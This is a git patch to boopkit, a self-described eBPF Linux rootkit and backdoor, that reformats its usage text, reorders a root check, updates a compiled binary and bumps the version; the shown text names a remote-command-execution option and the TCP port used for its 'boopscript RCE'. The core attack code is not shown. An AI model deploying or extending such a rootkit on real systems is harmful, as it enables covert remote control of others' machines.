From 2294719ebc88388b4b0cdc8edb00d21af5914ae7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Kris=20N=C3=B3va?= <kris@nivenly.com>
Date: Fri, 8 Apr 2022 19:44:08 -0400
Subject: [PATCH] Automatic commit from github.com/kris-nova/bin/git-save
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: Kris Nóva <kris@nivenly.com>
---
 boop/boopkit-boop   | Bin 26176 -> 26176 bytes
 boop/boopkit-boop.c |  19 +++++++++----------
 boopkit.c           |   3 ++-
 boopkit.h           |   2 +-
 4 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/boop/boopkit-boop b/boop/boopkit-boop
index d734c4c10594adc4d61e118e83cdd7748678fa56..66d9e974085964b7d2ab379bc957fb75b367e0f8 100755
GIT binary patch
delta 2500
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

delta 2501
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

diff --git a/boop/boopkit-boop.c b/boop/boopkit-boop.c
index 2e88ddf..2eac71e 100644
--- a/boop/boopkit-boop.c
+++ b/boop/boopkit-boop.c
@@ -51,17 +51,16 @@ void usage() {
   printf("Linux rootkit and backdoor over eBPF.\n");
   printf("Author: Kris Nóva <kris@nivenly.com>\n");
   printf("\n");
-  printf("Usage: boopkit-boop [options]\n");
+  printf("Usage: \n");
+  printf("boopkit-boop [options]\n");
   printf("\n");
   printf("Options:\n");
-  printf("-lhost             Local  (src) address: 127.0.0.1.\n");
-  printf("-lport             Local  (src) port:    3535\n");
-  printf("-rhost             Remote (dst) address: 127.0.0.1.\n");
-  printf("-rport             Remote (dst) port:    22\n");
-  printf(
-      "-x, execute        Command to execute on the boopscript server: ls "
-      "-la\n");
-  printf("-h, help           Display help and usage for boopkit.\n");
+  printf("-lhost             Local  (src) address   : 127.0.0.1.\n");
+  printf("-lport             Local  (src) port      :    3535\n");
+  printf("-rhost             Remote (dst) address   : 127.0.0.1.\n");
+  printf("-rport             Remote (dst) port      : 22\n");
+  printf("-x, execute        Remote command to exec : ls -la\n");
+  printf("-h, help           Print help and usage.\n");
   printf("\n");
   exit(0);
 }
@@ -175,8 +174,8 @@ int main(int argc, char **argv) {
   int one = 1;
   const int *oneval = &one;
   asciiheader();
-  rootcheck(argc, argv);
   clisetup(argc, argv);
+  rootcheck(argc, argv);
   srand(time(NULL));
   printf("RHOST    [%s]\n", cfg.rhost);
   printf("RPORT    [%s]\n", cfg.rport);
diff --git a/boopkit.c b/boopkit.c
index 421b6c5..43af2b8 100644
--- a/boopkit.c
+++ b/boopkit.c
@@ -55,7 +55,8 @@ void usage() {
   printf("Linux rootkit and backdoor over eBPF.\n");
   printf("Author: Kris Nóva <kris@nivenly.com>\n");
   printf("\n");
-  printf("Usage: boopkit [options]\n");
+  printf("Usage: \n");
+  printf("boopkit [options]\n");
   printf("\n");
   printf("Options:\n");
   printf("-h, help           Display help and usage for boopkit.\n");
diff --git a/boopkit.h b/boopkit.h
index 9bb4a4e..b9f563b 100644
--- a/boopkit.h
+++ b/boopkit.h
@@ -39,7 +39,7 @@ struct tcp_return {
 };
 
 // VERSION is the semantic version of the program
-#define VERSION "1.0.4"
+#define VERSION "1.0.5"
 
 // PORT for the boopkit TCP protocol for boopscript RCE
 #define PORT 3535